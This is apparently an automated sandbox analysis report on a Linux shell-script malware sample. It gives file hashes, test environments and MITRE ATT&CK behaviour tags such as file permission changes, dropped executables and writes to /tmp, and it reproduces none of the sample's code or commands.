Analysis
-
max time kernel
55s -
max time network
57s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
01-11-2024 04:36
Static task
static1
Behavioral task
behavioral1
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
-
Size
10KB
-
MD5
3dd5c19ec5fe98baa364142d535458dd
-
SHA1
07c95352a7b1f0aa31bea494cd8e2e4f6dfab78f
-
SHA256
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb
-
SHA512
81bcbab2896b757cdebbc6b90b866f6a591c375036fd0043391e2b28b69a7d3fdb2471e023cdf9a613e4e8c0ad008231e4089365151a7e6249a8825b5eb7a479
-
SSDEEP
192:sUA5CiAJnvavrYnXpapai2b66+SeKLDsvrYnXZ+i2b66SSe+dUA5CiKnv1:sUA5CiAJnv/apmHRSUA5CiKnv1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97